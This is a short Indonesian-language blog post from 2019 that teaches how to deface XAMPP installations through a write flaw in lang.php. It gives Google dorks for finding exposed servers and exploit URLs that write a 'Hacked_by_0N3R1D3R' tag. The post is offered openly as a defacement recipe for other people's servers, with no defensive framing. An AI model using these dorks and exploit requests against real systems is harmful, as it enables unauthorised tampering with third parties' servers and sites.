Cara Deface XAMPP Local Write Access Vulnerability | Info Links 378

Selasa, 09 April 2019

Cara Deface XAMPP Local Write Access Vulnerability

Cara Deface XAMPP Local Write Access Vulnerability

XAMPP ialah sebuah perangkat empuk open source yang mendukung tidak sedikit sistem operasi guna menjalankan suatu server dalam localhost. Dengan XAMPP, kita dapat menjalankan tidak sedikit program sekaligus dengan sekali klik laksana apache, mysql database, php dan perl.

Memang spektakuler program ini, namun dibalik semua tersebut XAMPP mempunyai sebuah kelemehan yakni pada file lang.php. Kelemahan ini terjadi sebab kita dapat mengirimkan suatu perintah tidak valid guna mengubah bahasa tanpa autentikasi. Tanpa terhubung kedalam jaringan lokal, kita dapat merubah file lang.tmp yang seharusnya memperlihatkan bahasa valid.

Itulah yang disebut xampp local write access. Teknik ini tergolong paling mudah, sebab kerjaannya bermukim exploit – exploit aja.

Dork:
inurl:/xampp/lang.php
inurl:/security/lang.php

Kembangin lagi gan.

Exploit:
/xampp/lang.php?Hacked_by_0N3R1D3R
/security/lang.php?Hacked_by_0N3R1D3R                       

Baca selengkapnya di XAMPP Local Write Access Vulnerability.

Load comments

Get notify via email